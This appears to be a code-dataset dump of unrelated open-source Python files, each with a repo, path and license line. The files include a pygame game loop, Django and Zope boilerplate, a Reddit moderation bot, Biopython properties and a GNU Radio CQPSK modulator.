baseShift = IMAGES['base'].get_width() - IMAGES['background'].get_width()
# player values
playerShmVals = {'val': 0, 'dir': 1}
while True:
for event in pygame.event.get():
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
if event.type == pygame.MOUSEBUTTONDOWN or (event.type == pygame.KEYUP and event.key == K_SPACE):
# first flap goes to maingame
SOUNDS['wing'].play()
return {
'playery': playery + playerShmVals['val'],
'basex': basex,
'pIndexGen': pIndexGen,
}
# adjust playery, pIndex, basex
if (loopIter + 1) % 5 == 0:
pIndex = next(pIndexGen)
loopIter = (loopIter + 1) % 30
basex = -((-basex + 4) % baseShift)
playerShm(playerShmVals)
# draw sprites
SCREEN.blit(IMAGES['background'], (0,0))
SCREEN.blit(IMAGES['player'][pIndex],
(playerx, playery + playerShmVals['val']))
SCREEN.blit(IMAGES['message'], (messagex, messagey))
SCREEN.blit(IMAGES['base'], (basex, BASEY))
pygame.display.update()
FPSCLOCK.tick(FPS)
def mainGame(movementInfo):
score = pIndex = loopIter = 0
pIndexGen = movementInfo['pIndexGen']
playerx, playery = int(SCREENWIDTH * 0.2), movementInfo['playery']
basex = movementInfo['basex']
baseShift = IMAGES['base'].get_width() - IMAGES['background'].get_width()
# get 2 random new pipes to add to highPipes lowPipes list of pipes
newPipe1 = getRandomPipe()
newPipe2 = getRandomPipe()
# list of upper pipes
highPipes = [
{'x': SCREENWIDTH + 200, 'y': newPipe1[0]['y']},
{'x': SCREENWIDTH + 200 + (SCREENWIDTH / 2), 'y': newPipe2[0]['y']},
]
# list of lowerpipe
| lowPipes = [
{'x': SCREENWIDTH + 200, 'y': newPipe1[1]['y']},
{'x': SCREENWIDTH + 200 + (SCREENWIDTH / 2), 'y': newPipe2[1]['y']},
]
pipeVelX = -4
# player velocity, max velocity, downward ac | cleration, accleration on flap
playerVelY = -9 # player's velocity along Y, default same as playerFlapped
playerMaxVelY = 10 # max vel along Y, max descend speed
playerMinVelY = -8 # min vel along Y, max ascend speed
playerAccY = 1 # players downward accleration
playerFlapAcc = -9 # players speed on flapping
playerFlapped = False # True when player flaps
while True:
for event in pygame.event.get():
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
if event.type == pygame.MOUSEBUTTONDOWN or (event.type == pygame.KEYUP and event.key == K_SPACE):
if playery > -2 * IMAGES['player'][0].get_height():
playerVelY = playerFlapAcc
playerFlapped = True
SOUNDS['wing'].play()
# check for if the bird crashed here
Testcrash = checkCrash({'x': playerx, 'y': playery, 'index': pIndex},
highPipes, lowPipes)
if Testcrash[0]:
return {
'y': playery,
'groundCrash': Testcrash[1],
'basex': basex,
'highPipes': h |
burk/helgapp | manage.py | Python | mit | 250 | 0 | #!/usr/bin/env python
import os
import s | ys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "helgapp.settings")
from django.core.management impo | rt execute_from_command_line
execute_from_command_line(sys.argv)
|
Donkyhotay/MoonPy | zope/security/tests/test_adapter.py | Python | gpl-3.0 | 948 | 0 | ##############################################################################
#
# Copy | right (c) 2004 Zope Corporation and Contributors.
# All R | ights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
$Id: test_adapter.py 67630 2006-04-27 00:54:03Z jim $
"""
import unittest
from zope.testing.doctestunit import DocTestSuite
def test_suite():
return unittest.TestSuite((
DocTestSuite('zope.security.adapter'),
))
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
bkidwell/caliload | caliload/metadata.py | Python | gpl-3.0 | 3,883 | 0.023178 | # Copyright 2011 Brendan Kidwell <brendan@glump.net>.
#
# This file is part of caliload.
#
# caliload is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# caliload is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with caliload. If not, see <http://www.gnu.org/licenses/>.
"""Interface to metadata. | opf ."""
from caliload.configobject import ConfigObject
from caliload.optionsobject import OptionsObject
from glob import glob
from uuid import uuid1
from xml.dom import minidom
import os
import subprocess
config = ConfigObject()
options = OptionsObject()
import logging
log = logging.getLogger(__name__)
def get_text(nodelist):
rc = []
for node in nodelist:
if node.nodeType == node.TEXT_N | ODE:
rc.append(node.data)
return ''.join(rc)
def get_book_filename(dir):
file = None
for ext in ("epub", "pdf"):
if not file is None: break
for n in glob(os.path.join(dir, "*.%s" % ext)):
if not n[0] == '_':
file = n
filetype = ext
break
if file is None:
raise RuntimeError("Can't find an ebook file.")
return (file, filetype)
class Metadata:
def __init__(self, useCached=True):
self.xmlfilename = os.path.join(options.dir, 'metadata.opf')
self.bookfile, self.type = get_book_filename(options.dir)
if not useCached or not os.path.exists(self.xmlfilename):
if useCached:
log.info("metadata.opf not found. Extracting from %s." % os.path.basename(self.bookfile))
else:
log.info("Loading metadata.opf from %s." % os.path.basename(self.bookfile))
cmd = [
config.ebookmeta_cmd, self.bookfile, '--to-opf=%s' % self.xmlfilename
]
subprocess.check_output(cmd)
log.info("Reading %s." % os.path.basename(self.xmlfilename))
self.xml = minidom.parse(self.xmlfilename)
self.metadata = self.xml.getElementsByTagName('metadata')[0]
self.uuidfile = os.path.join(options.dir, 'uuid')
self.id = None
for e in self.metadata.getElementsByTagName('dc:identifier'):
scheme = e.getAttribute('opf:scheme')
if scheme.lower() == 'caliload': self.id = get_text(e.childNodes)
if self.id is None:
self.recover_or_generateId()
if not os.path.exists(self.uuidfile):
f = open(self.uuidfile, 'w')
f.write(self.id + '\n')
f.close()
def recover_or_generateId(self):
"""Load UUID from uuid file or generate a new UUID; store UUID in metadata.opf ."""
if os.path.exists(self.uuidfile):
log.info("Found ID in uuid file. Writing to %s." % os.path.basename(self.xmlfilename))
f = open(self.uuidfile, 'r')
self.id = f.read().strip()
f.close()
else:
log.info("ID not found. Creating and saving a new ID.")
self.id = str(uuid1())
f = open(self.uuidfile, 'w')
f.write(self.id + '\n')
f.close()
# write data to XML doc
e = self.xml.createElement('dc:identifier')
e.setAttribute('opf:scheme', 'caliload')
textNode = self.xml.createTextNode(str(self.id))
e.appendChild(textNode)
self.metadata.appendChild(e)
# save metadata.opf
f = open(self.xmlfilename, 'w')
f.write(self.xml.toprettyxml(indent='', newl='', encoding='utf-8'))
f.close()
def write_to_book(self):
"""Write metadata.opf to ebook file."""
log.info("Writing metadata.opf to book file.")
# erase old tags
cmd = [
config.ebookmeta_cmd, self.bookfile, "--tags="
]
subprocess.check_output(cmd)
# write all metadata from opf file
cmd = [
config.ebookmeta_cmd, self.bookfile, '--from-opf=%s' % self.xmlfilename
]
subprocess.check_output(cmd)
|
chromium/chromium | third_party/android_deps/libs/com_android_support_support_media_compat/3pp/fetch.py | Python | bsd-3-clause | 2,505 | 0 | #!/usr/bin/env python3
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This is generated, do not edit. Update BuildConfigGenerator.groovy and
# 3ppFetch.template instead.
import argparse
import json
import os
import re
import urllib.request
_REPO_URL = 'https://dl.google.com/dl/android/maven2'
_GROUP_NAME = 'com/android/support'
_MODULE_NAME = 'support-media-compat'
_FILE_EXT = 'aar'
_OVERRIDE_LATEST = None
_PATCH_VERSION = 'cr1'
def do_latest():
if _OVERRIDE_LATEST is not None:
print(_OVERRIDE_LATEST + f'.{_PATCH_VERSION}')
return
maven_metadata_url = '{}/{}/{}/maven-metadata.xml'.format(
_REPO_URL, _GROUP_NAME, _MODULE_NAME)
metadata = urllib.request.urlopen(maven_metadata_url).read().decode(
'utf-8')
# Do not parse xml with the python included parser since it is susceptible
# to maliciously crafted xmls. Only use regular expression parsing to be
# safe. RE should be enough to handle what we need to extract.
match = re.search('<latest>([^<]+)</latest>', metadata)
if match:
latest = match.group(1)
else:
# if no latest info was found just hope the versions are sorted and the
# last one is the latest (as | is commonly the case).
latest = re.findall('<version>([^<]+)</version>', metadata)[-1]
print(latest + f'.{_PATCH_VERSION}')
def get_download_url(version):
# Remove the patch version when getting the download url
version_no | _patch, patch = version.rsplit('.', 1)
if patch.startswith('cr'):
version = version_no_patch
file_url = '{0}/{1}/{2}/{3}/{2}-{3}.{4}'.format(_REPO_URL, _GROUP_NAME,
_MODULE_NAME, version,
_FILE_EXT)
file_name = file_url.rsplit('/', 1)[-1]
partial_manifest = {
'url': [file_url],
'name': [file_name],
'ext': '.' + _FILE_EXT,
}
print(json.dumps(partial_manifest))
def main():
ap = argparse.ArgumentParser()
sub = ap.add_subparsers()
latest = sub.add_parser('latest')
latest.set_defaults(func=lambda _opts: do_latest())
download = sub.add_parser('get_url')
download.set_defaults(
func=lambda _opts: get_download_url(os.environ['_3PP_VERSION']))
opts = ap.parse_args()
opts.func(opts)
if __name__ == '__main__':
main()
|
dolphinkiss/cookiecutter-django-aws-eb | {{cookiecutter.project_name}}/wsgi_extra.py | Python | mit | 145 | 0 |
# wraps djangos normal wsgi application in whitenose
from whitenoise.djan | go imp | ort DjangoWhiteNoise
application = DjangoWhiteNoise(application)
|
TacticalGoat/reddit | DelayBot/delaybot.py | Python | mit | 3,987 | 0.021319 | #This bot was written by /u/GoldenSights for /u/FourMakesTwoUNLESS on behalf of /r/pkmntcgtrades. Uploaded to GitHub with permission.
import praw
import time
import datetime
import sqlite3
'''USER CONFIGURATION'''
APP_ID = ""
APP_SECRET = ""
APP_URI = ""
APP_REFRESH = ""
# https://www.reddit.com/comments/3cm1p8/how_to_make_your_bot_use_oauth2/
USERAGENT = ""
#This is a short description of what the bot does. For example "/u/GoldenSights' Newsletter Bot"
SUBREDDIT = ""
#This is the sub or list of subs to scan for new posts. For a single sub, use "sub1". For multiple subreddits, use "sub1+sub2+sub3+..."
MAXPOSTS = 30
#This is how many posts you want to retrieve all at once. PRAW can download 100 at a time.
WAIT = 20
#This is how many seconds you will wait between cycles. The bot is completely inactive during this time.
DELAY = 518400
#This is the time limit between a user's posts, IN SECONDS. 1h = 3600 || 12h = 43200 || 24h = 86400 || 144h = 518400
'''All done!'''
WAITS = str(WAIT)
sql = sqlite3.connect('sql.db')
print('Loaded SQL Database')
cur = sql.cursor()
cur.execute('CREATE TABLE IF NOT EXISTS users(name TEXT, lastpost TEXT)')
print('Loaded Users')
cur.execute('CREATE TABLE IF NOT EXISTS oldposts(id TEXT)')
print('Loaded Oldposts')
sql.commit()
r = praw.Reddit(USERAGENT)
r.set_oauth_app_info(APP_ID, APP_SECRET, APP_URI)
r.refresh_access_information(APP_REFRESH)
def getTime(bool):
timeNow = datetime.datetime.now(datetime.timezone.utc)
timeUnix = timeNow.timestamp()
if bool == False:
return timeNow
else:
return timeUnix
def scan():
print('Scanning ' + SUBREDDIT)
subreddit = r.get_subreddit(SUBREDDIT)
posts = subreddit.get_new(limit=MAXPOSTS)
for post in posts:
try:
pauthor = post.author.name
except Exception:
pauthor = '[deleted]'
pid = post.id
plink = post.short_link
ptime = post.created_utc
cur.execute('SELECT * FROM oldposts WHERE id=?', [pid])
if not cur.fetchone():
cur.execute('SELECT * FROM users WHERE name=?', [pauthor])
if not cur.fetchone():
print('Found new user: ' + pauthor)
cur.execute('INSERT INTO users VALUES(?, ?)', (pauthor, pid))
r.send_message(pauthor, 'Welcome','Dear ' + pauthor + ',\n\n This appears to be your first time here', captcha=None)
sql.commit()
print('\t' + pauthor + ' has been added to the database.')
time.sleep(5)
else:
cur.execute('SELECT * FROM users WHERE name=?', [pauthor])
fetch = cur.fetchone()
print('Found post by known user: ' + pauthor)
previousid = fetch[1]
previous = r.get_info(thing_id='t3_'+previousid)
previoustime = previous.created_utc
if ptime > previoustime:
curtime = getTime(True)
difference = curtime - previoustime
if difference >= DELAY:
print('\tPost complies with timelimit guidelines. Permitting')
cur.execute('DELETE FROM users WHERE n | ame=?', [pautho | r])
cur.execute('INSERT INTO users VALUES(?, ?)', (pauthor, pid))
sql.commit()
print('\t' + pauthor + "'s database info has been reset.")
else:
differences = '%.0f' % (DELAY - difference)
timestring = str(datetime.timedelta(seconds=float(differences)))
timestring = timestring.replace(':', ' hours, and ', 1)
timestring = timestring.replace(':', ' minutes.x', 1)
timestring = timestring.split('x')
timestring = timestring[0]
print('\tPost does not comply with timelimit guidelines. Author must wait ' + timestring)
print('\t' + pauthor + "'s database info remains unchanged")
response = post.add_comment('You are posting here too frequently, so your post has been deleted. You may post again in ' + str(timestring))
response.distinguish()
post.remove(spam=False)
time.sleep(5)
cur.execute('INSERT INTO oldposts VALUES(?)', [pid])
sql.commit()
while True:
try:
scan()
except Exception as e:
print('An error has occured:', e)
print('Running again in ' + WAITS + ' seconds.\n')
time.sleep(WAIT)
|
mhruscak/pyparted | tests/test_parted_filesystem.py | Python | gpl-2.0 | 2,438 | 0.002461 | #
# Test cases for the methods in the parted.filesystem module itself
#
# Copyright (C) 2009-2011 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PUR | POSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Bost | on, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): David Cantrell <dcantrell@redhat.com>
#
import unittest
# One class per method, multiple tests per class. For these simple methods,
# that seems like good organization. More complicated methods may require
# multiple classes and their own test suite.
@unittest.skip("Unimplemented test case.")
class FileSystemNewTestCase(unittest.TestCase):
def runTest(self):
# TODO
self.fail("Unimplemented test case.")
@unittest.skip("Unimplemented test case.")
class FileSystemGetSetTestCase(unittest.TestCase):
def runTest(self):
# TODO
self.fail("Unimplemented test case.")
@unittest.skip("Unimplemented test case.")
class FileSystemGetPedFileSystemTestCase(unittest.TestCase):
def runTest(self):
# TODO
self.fail("Unimplemented test case.")
@unittest.skip("Unimplemented test case.")
class FileSystemStrTestCase(unittest.TestCase):
def runTest(self):
# TODO
self.fail("Unimplemented test case.")
# And then a suite to hold all the test cases for this module.
def makeSuite():
suite = unittest.TestSuite()
suite.addTest(FileSystemNewTestCase())
suite.addTest(FileSystemGetSetTestCase())
suite.addTest(FileSystemGetPedFileSystemTestCase())
suite.addTest(FileSystemStrTestCase())
return suite
s = makeSuite()
if __name__ == "__main__":
unittest.main(defaultTest='s', verbosity=2)
|
Tsumiki-Chan/Neko-Chan | classes/messagehandler.py | Python | gpl-3.0 | 1,344 | 0.005952 | from functions import logger, config
import asyncio
class MessageHandler:
def __init__(self, client, message, command, args):
''' Create a new messagehandler which handles the required parts for the commands.
disabling this module will fuck up the whole bot.'''
self.client = client
self.message = message
self.command = command
self.channel = message.channel
self.access_level = 0
self.needed_level = 6
self.args = args
async def sendMessage(self, | text, channel=None):
'''
Sends a te | xt message to a channel.
Arguments:
(str) text: The message you want to send
(Optional) channel: The channel you want the message to be sent in
Returns:
An messageobject if the message has been sent, None otherwise.'''
message = None
text = str(text)
if len(text)==0:
raise ValueError("The message needs at least one character.")
if len(text)>2000:
raise ValueError("The message can\'t be more than 2000 chars")
if channel is None:
message = await self.client.send_message(self.channel, "\u200B{}".format(text))
else:
message = await self.client.send_message(channel, "\u200B{}".format(text))
return message |
rossjones/ScraperWikiX | web/urls.py | Python | agpl-3.0 | 3,556 | 0.005062 | from django.conf.urls.defaults import *
import frontend.views as frontend_views
import codewiki.views
import codewiki.viewsuml
from django.contrib.syndication.views import feed as feed_view
from django.views.generic import date_based, list_detail
from django.views.generic.simple import direct_to_template
from django.contrib import admin
import django.contrib.auth.views as auth_views
from django.conf import settings
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect, HttpResponsePermanentRedirect
from django.contrib import admin
admin.autodiscover()
# Need to move this somewhere more useful and try to make it less hacky but
# seems | to be the easiest way unfortunately.
from django.contrib.auth.models import User
User._meta.ordering = ['username']
from frontend.feeds import LatestCodeObjects, LatestCodeObjectsBySearchTerm, LatestCodeObjectsByTag, LatestViewObjects, LatestScraperObjects
feeds = {
'all_code_objects': LatestCodeObjects,
'all_scrapers': LatestScraperObjects,
'all_views': Latest | ViewObjects,
'latest_code_objects_by_search_term': LatestCodeObjectsBySearchTerm,
'latest_code_objects_by_tag': LatestCodeObjectsByTag,
}
urlpatterns = patterns('',
url(r'^$', frontend_views.frontpage, name="frontpage"),
# redirects from old version (would clashes if you happen to have a scraper whose name is list!)
(r'^scrapers/list/$', lambda request: HttpResponseRedirect(reverse('scraper_list_wiki_type', args=['scraper']))),
url(r'^', include('codewiki.urls')),
url(r'^logout/$', auth_views.logout, {'next_page': '/'}, name="logout"),
url(r'^accounts/', include('registration.urls')),
url(r'^accounts/resend_activation_email/', frontend_views.resend_activation_email, name="resend_activation_email"),
url(r'^captcha/', include('captcha.urls')),
url(r'^attachauth', codewiki.views.attachauth),
# allows direct viewing of the django tables
url(r'^admin/', include(admin.site.urls)),
# favicon
(r'^favicon\.ico$', 'django.views.generic.simple.redirect_to', {'url': '/media/images/favicon.ico'}),
# RSS feeds
url(r'^feeds/(?P<url>.*)/$', 'django.contrib.syndication.views.feed', {'feed_dict': feeds}, name='feeds'),
# API
(r'^api/', include('api.urls', namespace='foo', app_name='api')),
# Status
url(r'^status/$', codewiki.viewsuml.status, name='status'),
# Documentation
(r'^docs/', include('documentation.urls')),
# Robots.txt
(r'^robots.txt$', direct_to_template, {'template': 'robots.txt', 'mimetype': 'text/plain'}),
# pdf cropper technology
(r'^cropper/', include('cropper.urls')),
# froth
(r'^froth/', include('froth.urls')),
# static media server for the dev sites / local dev
url(r'^media/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_DIR, 'show_indexes':True}),
url(r'^media-admin/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ADMIN_DIR, 'show_indexes':True}),
#Rest of the site
url(r'^', include('frontend.urls')),
# redirects from old version
(r'^editor/$', lambda request: HttpResponseRedirect('/scrapers/new/python?template=tutorial_python_trivial')),
(r'^scrapers/show/(?P<short_name>[\w_\-]+)/(?:data/|map-only/)?$',
lambda request, short_name: HttpResponseRedirect(reverse('code_overview', args=['scraper', short_name]))),
)
|
jorgecarleitao/public-contracts | main/__init__.py | Python | bsd-3-clause | 140 | 0 | # See e.g. http://stackoverflow.com/ | a/14076841/931303
try:
import pymysql
pymysql.install_as_M | ySQLdb()
except ImportError:
pass
|
nmercier/linux-cross-gcc | win32/bin/Lib/distutils/command/install_scripts.py | Python | bsd-3-clause | 2,132 | 0.003752 | """distutils.command.install_scripts
Implements the Distutils 'install_scripts' command, for installing
Py | thon scripts."""
# contributed by Bastian Kleineidam
__revision__ = "$Id$"
import os
from distutils.core import Command
from distutils import log
from stat import ST_MODE
class install_scripts (Command):
| description = "install scripts (Python or otherwise)"
user_options = [
('install-dir=', 'd', "directory to install scripts to"),
('build-dir=','b', "build directory (where to install from)"),
('force', 'f', "force installation (overwrite existing files)"),
('skip-build', None, "skip the build steps"),
]
boolean_options = ['force', 'skip-build']
def initialize_options (self):
self.install_dir = None
self.force = 0
self.build_dir = None
self.skip_build = None
def finalize_options (self):
self.set_undefined_options('build', ('build_scripts', 'build_dir'))
self.set_undefined_options('install',
('install_scripts', 'install_dir'),
('force', 'force'),
('skip_build', 'skip_build'),
)
def run (self):
if not self.skip_build:
self.run_command('build_scripts')
self.outfiles = self.copy_tree(self.build_dir, self.install_dir)
if os.name == 'posix':
# Set the executable bits (owner, group, and world) on
# all the scripts we just installed.
for file in self.get_outputs():
if self.dry_run:
log.info("changing mode of %s", file)
else:
mode = ((os.stat(file)[ST_MODE]) | 0555) & 07777
log.info("changing mode of %s to %o", file, mode)
os.chmod(file, mode)
def get_inputs (self):
return self.distribution.scripts or []
def get_outputs(self):
return self.outfiles or []
# class install_scripts
|
BlogomaticProject/Blogomatic | opt/blog-o-matic/usr/lib/python/Bio/Encodings/IUPACEncoding.py | Python | gpl-2.0 | 5,460 | 0.000733 | """Properties once used for transcription and translation (DEPRECATED).
This module is deprecated, and is expected to be removed in the next release.
If you use this module, please contact the Biopython developers via the
mailing lists.
"""
#NOTE - Adding a deprecation warning would affect Bio.Alphabet.IUPAC
# Set up the IUPAC alphabet properties
from Bio.PropertyManager import default_manager
from Bio import Alphabet
from Bio.Alphabet import IUPAC
from Bio.Data import IUPACData
from Bio import Transcribe, Translate
set_prop = default_manager.class_property
# weight tables
set_prop[IUPAC.IUPACUnambiguousDNA]["weight_table"] = \
IUPACData.unambiguous_dna_weights
set_prop[IUPAC.IUPACAmbiguousDNA]["weight_table"] = \
IUPACData.avg_ambiguous_dna_weights
set_prop[IUPAC.IUPACUnambiguousRNA]["weight_table"] = \
IUPACData.unambiguous_rna_weights
set_prop[IUPAC.IUPACAmbiguousRNA]["weight_table"] = \
IUPACData.avg_ambiguous_rna_weights
set_prop[IUPAC.IUPACProtein]["weight_table"] = \
IUPACData.protein_weights
set_prop[IUPAC.ExtendedIUPACProtein]["weight_table"] = \
IUPACData.avg_extended_protein_weights
set_prop[IUPAC.IUPACUnambiguousDNA]["weight_range_table"] = \
IUPACData.unambiguous_dna_weight_ranges
set_prop[IUPAC.IUPACAmbiguousDNA]["weight_range_table"] = \
IUPACData.ambiguous_dna_weight_ranges
set_prop[IUPAC.IUPACUnambiguousRNA]["weight_range_table"] = \
IUPACData.unambiguous_rna_weight_ranges
set_prop[IUPAC.IUPACAmbiguousRNA]["weight_range_table"] = \
IUPACData.ambiguous_rna_weight_ranges
set_prop[IUPAC.IUPACProtein]["weight_range_table"] = \
IUPACData.protein_weight_ranges
set_prop[IUPAC.ExtendedIUPACProtein]["weight_range_table"] = \
IUPACData.extended_protein_weight_ranges
# transcriber objects
set_prop[Alphabet.DNAAlphabet]["transcriber"] = \
Transcribe.generic_transcriber
set_prop[IUPAC.IUPACAmbiguousDNA]["transcriber"] = \
Transcribe.ambiguous_transcriber
set_prop[IUPAC.IUPACUnambiguousDNA]["transcriber"] = \
Transcribe.unambiguous_transcriber
set_prop[Alphabet.RNAAlphabet]["transcriber"] = \
Transcribe.generic_transcriber
set_prop[IUPAC.IUPACAmbiguousRNA]["transcriber"] = \
Transcribe.ambiguous_transcriber
set_prop[IUPAC.IUPACUnambiguousRNA]["transcriber"] = \
Transcribe.unambiguous_transcriber
# translator objects
for name, obj in Translate.unambiguous_dna_by_name.iteritems():
property = "translator.name." + name
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
set_prop[obj.table.protein_alphabet.__class__][property] = obj
for name, obj in Translate.unambiguous_rna_by_name.iteritems():
property = "translator.name." + name
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
property = "rna_translator.name." + name
set_prop[obj.table.protein_alphabet.__class__][property] = obj
for id, obj in Translate.unambiguous_dna_by_id.iteritems():
property = "translator.id.%d" % id
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
set_prop[obj.table.protein_alphabet.__class__][property] = obj
if id == 1:
set_prop[obj.table.nucleotide_alphabet.__class__]["translator"] = obj
set_prop[obj.table.protein_alphabet.__class__]["translator"] = obj
for id, obj in Translate.unambiguous_rna_by_id.iteritems():
property = "translator.id.%d" % id
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
property = "rna_translator.id.%d" % id
set_prop[obj.table.protein_alphabet.__class__][property] = obj
if id == 1:
set_prop[obj.table.nucleotide_alphabet.__class__]["translator"] = obj
set_prop[obj.table.protein_alphabet.__class__]["rna_translator"] = obj
# ambiguous translator objects
for name, obj in Translate.ambiguous_dna_by_name.iteritems():
property = "translator.name." + name
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
property = "ambiguous_translator.name." + name
set_prop[obj.table.protein_alphabet.__class__][property] = obj
for name, obj in Translate.ambiguous_rna_by_name.iteritems():
property = "translator.name." + name
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
property = "ambiguous_rna_translator.name." + name
set_prop[obj.table.protein_alphabet.__class__][property] = obj
for id, obj in Translate.ambiguous_dna_by_id.iteritems():
property = "translator.id.%d" % id
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
property = "ambiguous_translator.id.%d" % id
set_prop[obj.table.protein_alphabet.__class__][property] = obj
if id == 1:
set_prop[obj.tab | le.nucleotide_alphabet.__class__]["translator"] = obj
set_prop[obj.table.protein_alphabet.__class__]["ambiguous_translator"] = obj
for id, obj in Translate.ambiguous_rna_by_id.iteritems():
property = "translator.id.%d" % id
set_prop[obj.table.nucleotide_alphabet.__class__][property] = obj
property = "ambiguous_rna_translator.id.%d" % id
set_prop[obj.table.protein_alphabet.__class__][property] = obj
if i | d == 1:
set_prop[obj.table.nucleotide_alphabet.__class__]["translator"] = obj
set_prop[obj.table.protein_alphabet.__class__]["ambiguous_rna_translator"] = obj
|
learntextvis/textkit | textkit/filter/filter_lengths.py | Python | mit | 491 | 0 | import click
from textkit.utils import output, read_tokens
|
@click.command()
@click.argument('tokens', type=click.File('r'), default=click.open_file('-'))
@click.option('-m', '--minimum', default=3,
help='Minimum length of token to not filter.', show_default=True)
def filterlengths(minimum, tokens):
'''Remove tokens that are shorter th | en the minimum length provided.'''
content = read_tokens(tokens)
[output(token) for token in content if len(token) >= minimum]
|
Tim---/osmo-tetra | src/demod/python/cqpsk.py | Python | agpl-3.0 | 14,762 | 0.009619 | #
# Copyright 2005,2006,2007 Free Software Foundation, Inc.
#
# cqpsk.py (C) Copyright 2009, KA1RBI
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
# See gnuradio-examples/python/digital for examples
"""
differential PI/4 CQPSK modulation and demodulation.
"""
from gnuradio import gr, gru, blocks, analog, filter, digital
from gnuradio.filter import firdes
from math import pi, sqrt
#import psk
import cmath
from pprint import pprint
_def_has_gr_digital = False
# address gnuradio 3.5.x chan | ges
try:
from gnuradio import modulation_utils
except ImportError:
from gnuradio import digital
_def_has_gr_dig | ital = True
# default values (used in __init__ and add_options)
_def_samples_per_symbol = 10
_def_excess_bw = 0.35
_def_gray_code = True
_def_verbose = False
_def_log = False
_def_costas_alpha = 0.15
_def_gain_mu = None
_def_mu = 0.5
_def_omega_relative_limit = 0.005
# /////////////////////////////////////////////////////////////////////////////
# CQPSK modulator
# /////////////////////////////////////////////////////////////////////////////
class cqpsk_mod(gr.hier_block2):
def __init__(self,
samples_per_symbol=_def_samples_per_symbol,
excess_bw=_def_excess_bw,
verbose=_def_verbose,
log=_def_log):
"""
Hierarchical block for RRC-filtered QPSK modulation.
The input is a byte stream (unsigned char) and the
output is the complex modulated signal at baseband.
@param samples_per_symbol: samples per symbol >= 2
@type samples_per_symbol: integer
@param excess_bw: Root-raised cosine filter excess bandwidth
@type excess_bw: float
@param verbose: Print information about modulator?
@type verbose: bool
@param debug: Print modualtion data to files?
@type debug: bool
"""
gr.hier_block2.__init__(self, "cqpsk_mod",
gr.io_signature(1, 1, gr.sizeof_char), # Input signature
gr.io_signature(1, 1, gr.sizeof_gr_complex)) # Output signature
self._samples_per_symbol = samples_per_symbol
self._excess_bw = excess_bw
if not isinstance(samples_per_symbol, int) or samples_per_symbol < 2:
raise TypeError, ("sbp must be an integer >= 2, is %d" % samples_per_symbol)
ntaps = 11 * samples_per_symbol
arity = 8
# turn bytes into k-bit vectors
self.bytes2chunks = \
gr.packed_to_unpacked_bb(self.bits_per_symbol(), gr.GR_MSB_FIRST)
# 0 +45 1 [+1]
# 1 +135 3 [+3]
# 2 -45 7 [-1]
# 3 -135 5 [-3]
self.pi4map = [1, 3, 7, 5]
self.symbol_mapper = gr.map_bb(self.pi4map)
self.diffenc = gr.diff_encoder_bb(arity)
self.chunks2symbols = gr.chunks_to_symbols_bc(psk.constellation[arity])
# pulse shaping filter
self.rrc_taps = firdes.root_raised_cosine(
self._samples_per_symbol, # gain (sps since we're interpolating by sps)
self._samples_per_symbol, # sampling rate
1.0, # symbol rate
self._excess_bw, # excess bandwidth (roll-off factor)
ntaps)
self.rrc_filter = filter.interp_fir_filter_ccf(self._samples_per_symbol, self.rrc_taps)
if verbose:
self._print_verbage()
if log:
self._setup_logging()
# Connect & Initialize base class
self.connect(self, self.bytes2chunks, self.symbol_mapper, self.diffenc,
self.chunks2symbols, self.rrc_filter, self)
def samples_per_symbol(self):
return self._samples_per_symbol
def bits_per_symbol(self=None): # staticmethod that's also callable on an instance
return 2
bits_per_symbol = staticmethod(bits_per_symbol) # make it a static method. RTFM
def _print_verbage(self):
